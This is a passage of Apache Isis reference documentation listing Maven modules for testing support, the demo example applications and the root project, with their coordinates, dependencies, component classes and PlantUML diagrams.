xref:refguide:testing:index\/specsupport\/applib\/integration\/ObjectFactoryForIntegration.adoc[ObjectFactoryForIntegration], xref:refguide:testing:index\/specsupport\/applib\/specs\/V.adoc[V]\n****\n\n|Apache Isis Tst - Unit Test Support (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-unittestsupport\nType: pom\nDirectory: \/testing\/unittestsupport\n----\n|A module providing test utilities for unit testing of domain modules\n\n|Apache Isis Tst - Unit Test Support (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-unittestsupport-applib\nType: jar\nDirectory: \/testing\/unittestsupport\/applib\n----\n|.Dependencies\n****\ncom.approvaltests:approvaltests:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-codegen-bytebuddy:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\norg.jmock:jmock:jar:<managed> +\norg.jmock:jmock-junit4:jar:<managed> +\norg.picocontainer:picocontainer:jar:<managed> +\norg.slf4j:slf4j-api:jar:<managed> +\norg.springframework:spring-test:jar:<managed> +\norg.springframework.boot:spring-boot-starter-test:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:testing:index\/unittestsupport\/applib\/IsisModuleTestingUnitTestSupportApplib.adoc[IsisModuleTestingUnitTestSupportApplib], xref:refguide:testing:index\/unittestsupport\/applib\/bean\/AbstractBeanPropertiesTest.adoc[AbstractBeanPropertiesTest], xref:refguide:testing:index\/unittestsupport\/applib\/bean\/FixtureDatumFactoriesForAnyPojo.adoc[FixtureDatumFactoriesForAnyPojo], xref:refguide:testing:index\/unittestsupport\/applib\/bean\/FixtureDatumFactoriesForApplib.adoc[FixtureDatumFactoriesForApplib], xref:refguide:testing:index\/unittestsupport\/applib\/bean\/FixtureDatumFactoriesForJoda.adoc[FixtureDatumFactoriesForJoda], xref:refguide:testing:index\/unittestsupport\/applib\/bean\/FixtureDatumFactoriesForTime.adoc[FixtureDatumFactoriesForTime], xref:refguide:testing:index\/unittestsupport\/applib\/bean\/PojoTester.adoc[PojoTester], xref:refguide:testing:index\/unittestsupport\/applib\/core\/AbstractApplyToAllContractTest.adoc[AbstractApplyToAllContractTest], xref:refguide:testing:index\/unittestsupport\/applib\/core\/bidir\/BidirectionalRelationshipContractTestAbstract.adoc[BidirectionalRelationshipContractTestAbstract], xref:refguide:testing:index\/unittestsupport\/applib\/core\/bidir\/Instantiator.adoc[Instantiator], xref:refguide:testing:index\/unittestsupport\/applib\/core\/bidir\/InstantiatorSimple.adoc[InstantiatorSimple], xref:refguide:testing:index\/unittestsupport\/applib\/core\/bidir\/Instantiators.adoc[Instantiators], xref:refguide:testing:index\/unittestsupport\/applib\/core\/comparable\/ComparableContractTest_compareTo.adoc[ComparableContractTest_compareTo], xref:refguide:testing:index\/unittestsupport\/applib\/core\/comparable\/ComparableContractTester.adoc[ComparableContractTester], xref:refguide:testing:index\/unittestsupport\/applib\/core\/files\/Files.adoc[Files], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jaxb\/JaxbMatchers.adoc[JaxbMatchers], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jmocking\/Imposterisers.adoc[Imposterisers], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jmocking\/InjectIntoJMockAction.adoc[InjectIntoJMockAction], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jmocking\/IsisActions.adoc[IsisActions], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jmocking\/JMockActions.adoc[JMockActions], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jmocking\/JUnitRuleMockery2.adoc[JUnitRuleMockery2], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jmocking\/PostponedAction.adoc[PostponedAction], xref:refguide:testing:index\/unittestsupport\/applib\/core\/soap\/SoapEndpointPublishingRule.adoc[SoapEndpointPublishingRule], xref:refguide:testing:index\/unittestsupport\/applib\/core\/soap\/SoapEndpointSpec.adoc[SoapEndpointSpec], xref:refguide:testing:index\/unittestsupport\/applib\/core\/sortedsets\/SortedSetsContractTestAbstract.adoc[SortedSetsContractTestAbstract], xref:refguide:testing:index\/unittestsupport\/applib\/core\/streams\/NullPrintStream.adoc[NullPrintStream], xref:refguide:testing:index\/unittestsupport\/applib\/core\/utils\/CollectUtils.adoc[CollectUtils], xref:refguide:testing:index\/unittestsupport\/applib\/core\/utils\/IndentPrinter.adoc[IndentPrinter], xref:refguide:testing:index\/unittestsupport\/applib\/core\/utils\/ReflectUtils.adoc[ReflectUtils], xref:refguide:testing:index\/unittestsupport\/applib\/core\/utils\/StringUtils.adoc[StringUtils], xref:refguide:testing:index\/unittestsupport\/applib\/core\/value\/ValueTypeContractTestAbstract.adoc[ValueTypeContractTestAbstract], xref:refguide:testing:index\/unittestsupport\/applib\/dom\/assertions\/Asserting.adoc[Asserting], xref:refguide:testing:index\/unittestsupport\/applib\/dom\/matchers\/IsisMatchers.adoc[IsisMatchers], xref:refguide:testing:index\/unittestsupport\/applib\/dom\/privatecons\/PrivateConstructorTester.adoc[PrivateConstructorTester], xref:refguide:testing:index\/unittestsupport\/applib\/dom\/reflect\/ReflectUtils.adoc[ReflectUtils], xref:refguide:testing:index\/unittestsupport\/applib\/dom\/repo\/FinderInteraction.adoc[FinderInteraction]\n****\n|===\n\n== Examples\n\n[plantuml,Examples,svg]\n----\n@startuml(id=Examples)\ntitle Examples - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Examples\\n[Software System]\" {\n rectangle \"==Demo - Domain\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Demo - JavaFX\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Demo - Parent\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Demo - Vaadin\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Demo - Web\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Demo - Wicket\\n<size:10>[Container: packaging: jar]<\/size>\" <<7>> as 7\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 7 : \"\"\n@enduml\n----\n.Projects\/Modules (Examples)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Demo - Parent\n[source,yaml]\n----\nGroup: org.apache.isis.examples.apps\nArtifact: demo-parent\nType: pom\nDirectory: \/examples\/demo\n----\n|.Dependencies\n****\ncom.h2database:h2:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-exceldownload-ui:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-modelannotation:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-encryption-jbcrypt:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-model:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-persistence-jdo:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-shiro-realm:jar:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdk11:pom:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdo:pom:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-persistence-jdo-dn5:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-persistence-jdo-dn5:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-sse-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Demo - Domain\n[source,yaml]\n----\nGroup: org.apache.isis.examples.apps\nArtifact: demo-domain\nType: jar\nDirectory: \/examples\/demo\/domain\n----\n|.Components\n****\ndemoapp.dom.AppConfiguration +\ndemoapp.dom._infra.DefaultTitleProvider +\ndemoapp.dom._infra.LibraryPreloadingService +\ndemoapp.dom._infra.fixtures.DemoFixtureScriptSpecificationProvider +\ndemoapp.dom._infra.resources.AsciiDocConverterService +\ndemoapp.dom._infra.resources.AsciiDocReaderService +\ndemoapp.dom._infra.resources.MarkdownReaderService +\ndemoapp.dom._infra.resources.MarkupReaderService +\ndemoapp.dom._infra.resources.MarkupVariableResolverService +\ndemoapp.dom._infra.resources.ResourceReaderService +\ndemoapp.dom._infra.samples.NameSamples +\ndemoapp.dom._infra.urlencoding.UrlEncodingServiceNaiveInMemory +\ndemoapp.dom.domain._changes.EntityChangesSubscriberToCaptureChangesInMemory +\ndemoapp.dom.domain._commands.ExposePersistedCommands$TableColumnOrderDefault +\ndemoapp.dom.domain._interactions.ExecutionListenerToCaptureInteractionsInMemory +\ndemoapp.dom.domain.actions.Action.commandPublishing.ActionCommandPublishingJdoEntities +\ndemoapp.dom.domain.actions.Action.commandPublishing.ActionCommandPublishingJdoSeedService +\ndemoapp.dom.domain.actions.Action.executionPublishing.ActionExecutionPublishingJdoEntities +\ndemoapp.dom.domain.actions.Action.executionPublishing.ActionExecutionPublishingJdoSeedService +\ndemoapp.dom.domain.objects.DomainObject.entityChangePublishing.annotated.disabled.DomainObjectEntityChangePublishingDisabledJdoEntities +\ndemoapp.dom.domain.objects.DomainObject.entityChangePublishing.annotated.disabled.DomainObjectEntityChangePublishingDisabledJdoSeedService +\ndemoapp.dom.domain.objects.DomainObject.entityChangePublishing.annotated.enabled.DomainObjectAuditingEnabledJdoEntities +\ndemoapp.dom.domain.objects.DomainObject.entityChangePublishing.annotated.enabled.DomainObjectAuditingEnabledJdoSeedService +\ndemoapp.dom.domain.objects.DomainObject.entityChangePublishing.metaAnnot.enabled.DomainObjectEntityChangePublishingEnabledMetaAnnotatedJdoEntities +\ndemoapp.dom.domain.objects.DomainObject.entityChangePublishing.metaAnnot.enabled.DomainObjectEntityChangePublishingEnabledMetaAnnotatedJdoSeedService +\ndemoapp.dom.domain.objects.DomainObject.entityChangePublishing.metaAnnotOverridden.enabled.DomainObjectEntityChangePublishingEnabledMetaAnnotOverriddenJdoEntities +\ndemoapp.dom.domain.objects.DomainObject.entityChangePublishing.metaAnnotOverridden.enabled.DomainObjectEntityChangePublishingEnabledMetaAnnotOverriddenJdoSeedService +\ndemoapp.dom.domain.objects.DomainObject.nature.viewmodels.jaxbrefentity.ChildJdoEntities +\ndemoapp.dom.domain.objects.DomainObject.nature.viewmodels.jaxbrefentity.seed.ChildJdoSeedService +\ndemoapp.dom.domain.objects.other.embedded.NumberConstantJdoRepository +\ndemoapp.dom.domain.properties.Property.commandPublishing.PropertyCommandPublishingJdoEntities +\ndemoapp.dom.domain.properties.Property.commandPublishing.PropertyCommandPublishingJdoSeedService +\ndemoapp.dom.domain.properties.Property.executionPublishing.PropertyExecutionPublishingJdoEntities +\ndemoapp.dom.domain.properties.Property.executionPublishing.PropertyExecutionPublishingJdoSeedService +\ndemoapp.dom.domain.properties.Property.projecting.jdo.PropertyProjectingChildJdoEntities +\ndemoapp.dom.domain.properties.Property.projecting.jdo.PropertyProjectingChildJdoSeedService +\ndemoapp.dom.domain.properties.PropertyLayout.navigable.FileTreeNodeService +\ndemoapp.dom.domain.properties.PropertyLayout.repainting.PdfJsViewerAdvisorFallback +\ndemoapp.dom.featured.customui.geocoding.GeoapifyClient +\ndemoapp.dom.services.core.errorreportingservice.ErrorReportingServiceDemoImplementation +\ndemoapp.dom.services.core.eventbusservice.EventLogEntryJdoRepository +\ndemoapp.dom.services.core.eventbusservice.EventSubscriberDemoImplementation +\ndemoapp.dom.services.core.wrapperFactory.WrapperFactoryJdoEntities +\ndemoapp.dom.services.core.wrapperFactory.WrapperFactoryJdoSeedService +\ndemoapp.dom.services.extensions.secman.apptenancy.ApplicationTenancyEvaluatorForDemo +\ndemoapp.dom.services.extensions.secman.apptenancy.entities.TenantedJdoEntities +\ndemoapp.dom.services.extensions.secman.apptenancy.entities.seed.TenantedJdoSeedService +\ndemoapp.dom.types.isis.blobs.jdo.IsisBlobJdoEntities +\ndemoapp.dom.types.isis.blobs.jdo.IsisBlobJdoSeedService +\ndemoapp.dom.types.isis.blobs.samples.IsisBlobsSamples +\ndemoapp.dom.types.isis.clobs.jdo.IsisClobJdoEntities +\ndemoapp.dom.types.isis.clobs.jdo.IsisClobJdoSeedService +\ndemoapp.dom.types.isis.clobs.samples.IsisClobsSamples +\ndemoapp.dom.types.isis.localresourcepaths.jdo.IsisLocalResourcePathJdoEntities +\ndemoapp.dom.types.isis.localresourcepaths.jdo.IsisLocalResourcePathJdoSeedService +\ndemoapp.dom.types.isis.localresourcepaths.samples.IsisLocalResourcePathsSamples +\ndemoapp.dom.types.isis.markups.jdo.IsisMarkupJdoEntities +\ndemoapp.dom.types.isis.markups.jdo.IsisMarkupJdoSeedService +\ndemoapp.dom.types.isis.markups.samples.IsisMarkupSamples +\ndemoapp.dom.types.isis.passwords.jdo.IsisPasswordJdoEntities +\ndemoapp.dom.types.isis.passwords.jdo.IsisPasswordJdoSeedService +\ndemoapp.dom.types.isis.passwords.samples.IsisPasswordsSamples +\ndemoapp.dom.types.isisext.asciidocs.jdo.IsisAsciiDocJdoEntities +\ndemoapp.dom.types.isisext.asciidocs.jdo.IsisAsciiDocJdoSeedService +\ndemoapp.dom.types.isisext.asciidocs.samples.IsisAsciiDocSamples +\ndemoapp.dom.types.isisext.markdowns.jdo.IsisMarkdownJdoEntities +\ndemoapp.dom.types.isisext.markdowns.jdo.IsisMarkdownJdoSeedService +\ndemoapp.dom.types.isisext.markdowns.samples.IsisMarkdownSamples +\ndemoapp.dom.types.javaawt.images.jdo.JavaAwtImageJdoEntities +\ndemoapp.dom.types.javaawt.images.jdo.JavaAwtImageJdoSeedService +\ndemoapp.dom.types.javaawt.images.samples.JavaAwtImageService +\ndemoapp.dom.types.javaawt.images.samples.JavaAwtImagesSamples +\ndemoapp.dom.types.javalang.booleans.jdo.WrapperBooleanJdoEntities +\ndemoapp.dom.types.javalang.booleans.jdo.WrapperBooleanJdoSeedService +\ndemoapp.dom.types.javalang.booleans.samples.WrapperBooleanSamples +\ndemoapp.dom.types.javalang.bytes.jdo.WrapperByteJdoEntities +\ndemoapp.dom.types.javalang.bytes.jdo.WrapperByteJdoSeedService +\ndemoapp.dom.types.javalang.bytes.samples.WrapperByteSamples +\ndemoapp.dom.types.javalang.characters.jdo.WrapperCharacterJdoEntities +\ndemoapp.dom.types.javalang.characters.jdo.WrapperCharacterJdoSeedService +\ndemoapp.dom.types.javalang.characters.samples.WrapperCharacterSamples +\ndemoapp.dom.types.javalang.doubles.jdo.WrapperDoubleJdoEntities +\ndemoapp.dom.types.javalang.doubles.jdo.WrapperDoubleJdoSeedService +\ndemoapp.dom.types.javalang.doubles.samples.WrapperDoubleSamples +\ndemoapp.dom.types.javalang.floats.jdo.WrapperFloatJdoEntities +\ndemoapp.dom.types.javalang.floats.jdo.WrapperFloatJdoSeedService +\ndemoapp.dom.types.javalang.floats.samples.WrapperFloatSamples +\ndemoapp.dom.types.javalang.integers.jdo.WrapperIntegerJdoEntities +\ndemoapp.dom.types.javalang.integers.jdo.WrapperIntegerJdoSeedService +\ndemoapp.dom.types.javalang.integers.samples.WrapperIntegerSamples +\ndemoapp.dom.types.javalang.longs.jdo.WrapperLongJdoEntities +\ndemoapp.dom.types.javalang.longs.jdo.WrapperLongJdoSeedService +\ndemoapp.dom.types.javalang.longs.samples.WrapperLongSamples +\ndemoapp.dom.types.javalang.shorts.jdo.WrapperShortJdoEntities +\ndemoapp.dom.types.javalang.shorts.jdo.WrapperShortJdoSeedService +\ndemoapp.dom.types.javalang.shorts.samples.WrapperShortSamples +\ndemoapp.dom.types.javalang.strings.jdo.JavaLangStringJdoEntities +\ndemoapp.dom.types.javalang.strings.jdo.JavaLangStringJdoSeedService +\ndemoapp.dom.types.javalang.strings.samples.JavaLangStringSamples +\ndemoapp.dom.types.javamath.bigdecimals.jdo.JavaMathBigDecimalJdoEntities +\ndemoapp.dom.types.javamath.bigdecimals.jdo.JavaMathBigDecimalJdoSeedService +\ndemoapp.dom.types.javamath.bigdecimals.samples.JavaMathBigDecimalSamples +\ndemoapp.dom.types.javamath.bigintegers.jdo.JavaMathBigIntegerJdoEntities +\ndemoapp.dom.types.javamath.bigintegers.jdo.JavaMathBigIntegerJdoSeedService +\ndemoapp.dom.types.javamath.bigintegers.samples.JavaMathBigIntegerSamples +\ndemoapp.dom.types.javanet.urls.jdo.JavaNetUrlJdoEntities +\ndemoapp.dom.types.javanet.urls.jdo.JavaNetUrlJdoSeedService +\ndemoapp.dom.types.javanet.urls.samples.JavaNetUrlSamples +\ndemoapp.dom.types.javasql.javasqldate.jdo.JavaSqlDateJdoEntities +\ndemoapp.dom.types.javasql.javasqldate.jdo.JavaSqlDateJdoSeedService +\ndemoapp.dom.types.javasql.javasqldate.samples.JavaSqlDateSamples +\ndemoapp.dom.types.javasql.javasqltimestamp.jdo.JavaSqlTimestampJdoEntities +\ndemoapp.dom.types.javasql.javasqltimestamp.jdo.JavaSqlTimestampJdoSeedService +\ndemoapp.dom.types.javasql.javasqltimestamp.samples.JavaSqlTimestampSamples +\ndemoapp.dom.types.javatime.javatimelocaldate.jdo.JavaTimeLocalDateJdoEntities +\ndemoapp.dom.types.javatime.javatimelocaldate.jdo.JavaTimeLocalDateJdoSeedService +\ndemoapp.dom.types.javatime.javatimelocaldate.samples.JavaTimeLocalDateSamples +\ndemoapp.dom.types.javatime.javatimelocaldatetime.jdo.JavaTimeLocalDateTimeJdoEntities +\ndemoapp.dom.types.javatime.javatimelocaldatetime.jdo.JavaTimeLocalDateTimeJdoSeedService +\ndemoapp.dom.types.javatime.javatimelocaldatetime.samples.JavaTimeLocalDateTimeSamples +\ndemoapp.dom.types.javatime.javatimeoffsetdatetime.jdo.JavaTimeOffsetDateTimeJdoEntities +\ndemoapp.dom.types.javatime.javatimeoffsetdatetime.jdo.JavaTimeOffsetDateTimeJdoSeedService +\ndemoapp.dom.types.javatime.javatimeoffsetdatetime.samples.JavaTimeOffsetDateTimeSamples +\ndemoapp.dom.types.javatime.javatimeoffsettime.jdo.JavaTimeOffsetTimeJdoEntities +\ndemoapp.dom.types.javatime.javatimeoffsettime.jdo.JavaTimeOffsetTimeJdoSeedService +\ndemoapp.dom.types.javatime.javatimeoffsettime.samples.JavaTimeOffsetTimeSamples +\ndemoapp.dom.types.javatime.javatimezoneddatetime.jdo.JavaTimeZonedDateTimeJdoEntities +\ndemoapp.dom.types.javatime.javatimezoneddatetime.jdo.JavaTimeZonedDateTimeJdoSeedService +\ndemoapp.dom.types.javatime.javatimezoneddatetime.samples.JavaTimeZonedDateTimeSamples +\ndemoapp.dom.types.javautil.javautildate.jdo.JavaUtilDateJdoEntities +\ndemoapp.dom.types.javautil.javautildate.jdo.JavaUtilDateJdoSeedService +\ndemoapp.dom.types.javautil.javautildate.samples.JavaUtilDateSamples +\ndemoapp.dom.types.javautil.uuids.jdo.JavaUtilUuidJdoEntities +\ndemoapp.dom.types.javautil.uuids.jdo.JavaUtilUuidJdoSeedService +\ndemoapp.dom.types.javautil.uuids.samples.JavaUtilUuidSamples +\ndemoapp.dom.types.jodatime.jodadatetime.jdo.JodaDateTimeJdoEntities +\ndemoapp.dom.types.jodatime.jodadatetime.jdo.JodaDateTimeJdoSeedService +\ndemoapp.dom.types.jodatime.jodadatetime.samples.JodaDateTimeSamples +\ndemoapp.dom.types.jodatime.jodalocaldate.jdo.JodaLocalDateJdoEntities +\ndemoapp.dom.types.jodatime.jodalocaldate.jdo.JodaLocalDateJdoSeedService +\ndemoapp.dom.types.jodatime.jodalocaldate.samples.JodaLocalDateSamples +\ndemoapp.dom.types.jodatime.jodalocaldatetime.jdo.JodaLocalDateTimeJdoEntities +\ndemoapp.dom.types.jodatime.jodalocaldatetime.jdo.JodaLocalDateTimeJdoSeedService +\ndemoapp.dom.types.jodatime.jodalocaldatetime.samples.JodaLocalDateTimeSamples +\ndemoapp.dom.types.primitive.booleans.jdo.PrimitiveBooleanJdoEntities +\ndemoapp.dom.types.primitive.booleans.jdo.PrimitiveBooleanJdoSeedService +\ndemoapp.dom.types.primitive.bytes.jdo.PrimitiveByteJdoEntities +\ndemoapp.dom.types.primitive.bytes.jdo.PrimitiveByteJdoSeedService +\ndemoapp.dom.types.primitive.chars.jdo.PrimitiveCharJdoEntities +\ndemoapp.dom.types.primitive.chars.jdo.PrimitiveCharJdoSeedService +\ndemoapp.dom.types.primitive.doubles.jdo.PrimitiveDoubleJdoEntities +\ndemoapp.dom.types.primitive.doubles.jdo.PrimitiveDoubleJdoSeedService +\ndemoapp.dom.types.primitive.floats.jdo.PrimitiveFloatJdoEntities +\ndemoapp.dom.types.primitive.floats.jdo.PrimitiveFloatJdoSeedService +\ndemoapp.dom.types.primitive.ints.jdo.PrimitiveIntJdoEntities +\ndemoapp.dom.types.primitive.ints.jdo.PrimitiveIntJdoSeedService +\ndemoapp.dom.types.primitive.longs.jdo.PrimitiveLongJdoEntities +\ndemoapp.dom.types.primitive.longs.jdo.PrimitiveLongJdoSeedService +\ndemoapp.dom.types.primitive.shorts.jdo.PrimitiveShortJdoEntities +\ndemoapp.dom.types.primitive.shorts.jdo.PrimitiveShortJdoSeedService +\n****\n\n.Dependencies\n****\ncom.h2database:h2:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-command-log-jdo:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-exceldownload-ui:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-modelannotation:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-pdfjs-applib:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-encryption-jbcrypt:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-model:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-persistence-jdo:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-shiro-realm:jar:<managed> +\norg.apache.isis.testing:isis-testing-h2console-ui:jar:<managed> +\norg.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-applib:jar:<managed> +\norg.assertj:assertj-core:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\norg.springframework.boot:spring-boot-configuration-processor:jar:<managed> +\n****\n\n|Demo - JavaFX\n[source,yaml]\n----\nGroup: org.apache.isis.examples.apps\nArtifact: demo-javafx\nType: jar\nDirectory: \/examples\/demo\/javafx\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.core:isis-core-security:jar:<managed> +\norg.apache.isis.examples.apps:demo-domain:jar:${project.version} +\norg.apache.isis.incubator.viewer:isis-viewer-javafx-viewer:jar:${project.version} +\norg.apache.isis.mavendeps:isis-mavendeps-integtests:pom:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdk11:pom:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.security:isis-security-bypass:jar:<managed> +\norg.apache.isis.security:isis-security-shiro:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-ui:pom:${project.version} +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-ui:pom:${project.version} +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Demo - Vaadin\n[source,yaml]\n----\nGroup: org.apache.isis.examples.apps\nArtifact: demo-vaadin\nType: jar\nDirectory: \/examples\/demo\/vaadin\n----\n|.Dependencies\n****\norg.apache.isis.examples.apps:demo-web:jar:${project.version} +\norg.apache.isis.incubator.viewer:isis-viewer-vaadin-viewer:jar:${project.version} +\norg.apache.isis.mavendeps:isis-mavendeps-jdk11:pom:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-ui-vaa:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-ui-wkt:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-ui-wkt:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-sse-ui-wkt:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Demo - Web\n[source,yaml]\n----\nGroup: org.apache.isis.examples.apps\nArtifact: demo-web\nType: jar\nDirectory: \/examples\/demo\/web\n----\n|.Components\n****\ndemoapp.web._infra.utils.ThereCanBeOnlyOne +\n****\n\n.Dependencies\n****\norg.apache.isis.examples.apps:demo-domain:jar:${project.version} +\norg.apache.isis.extensions:isis-extensions-command-replay-primary:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-command-replay-secondary:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-cors-impl:jar:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-webapp:pom:<managed> +\norg.springframework.boot:spring-boot-starter:jar:<managed> +\norg.springframework.boot:spring-boot-starter-actuator:jar:<managed> +\norg.springframework.boot:spring-boot-starter-log4j2:jar:<managed> +\n****\n\n|Demo - Wicket\n[source,yaml]\n----\nGroup: org.apache.isis.examples.apps\nArtifact: demo-wicket\nType: jar\nDirectory: \/examples\/demo\/wicket\n----\n|.Components\n****\ndemoapp.webapp.wicket.ui.custom.WhereInTheWorldPanelFactory +\n****\n\n.Dependencies\n****\norg.apache.isis.examples.apps:demo-web:jar:${project.version} +\norg.apache.isis.extensions:isis-extensions-pdfjs-ui:jar:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-webapp:pom:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-ui-wkt:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-ui-wkt:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-sse-ui-wkt:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:2.0.0-SNAPSHOT +\norg.apache.isis.viewer:isis-viewer-wicket-viewer:jar:2.0.0-SNAPSHOT +\n****\n|===\n\n== Root\n\n[plantuml,Root,svg]\n----\n@startuml(id=Root)\ntitle Root - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Root\\n[Software System]\" {\n rectangle \"==Apache Isis\\n<size:10>[Container: packaging: pom]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis (Aggregator)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis - Antora\\n<size:10>[Container: packaging: pom]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Supplemental - Legal Info\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n}\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (Root)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis (Aggregator)\n[source,yaml]\n----\nGroup: org.apache.isis\nArtifact: isis-all\nType: pom\nDirectory: \/\n----\n|Convenience aggregator POM that references all modules, some explicitely,\nothers via profiles, that are not activiated per default.\nThe parent POM of the core framework is isis-parent\/pom.xml.\n\n|Apache Isis - Antora\n[source,yaml]\n----\nGroup: org.apache.isis\nArtifact: antora\nType: pom\nDirectory: \/antora\n----\n|\n\n|Apache Isis\n[source,yaml]\n----\nGroup: org.apache.isis\nArtifact: isis-parent\nType: pom\nDirectory: \/isis-parent\n----\n|Parent for the core framework + extensions, starter parent pom for starter apps.\n\n|Apache Isis Supplemental - Legal Info\n[source,yaml]\n----\nGroup: org.apache.isis\nArtifact: supplemental-model\nType: jar\nDirectory: \/supplemental-model\n----\n|For example, the templates used by many Apache distributions assemble a listing of project dependencies\naccording to their organization name (and URL), along with the URL each project's website. When dependency\nPOMs are missing this information, the dependency notice file that the Remote Resources Plugin renders can\nbe invalid.\nTo compensate for incomplete dependency POMs, we use the supplemental models support.\n|===\n\n== Commons\n\n[plantuml,Commons,svg]\n----\n@startuml(id=Commons)\ntitle Commons - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 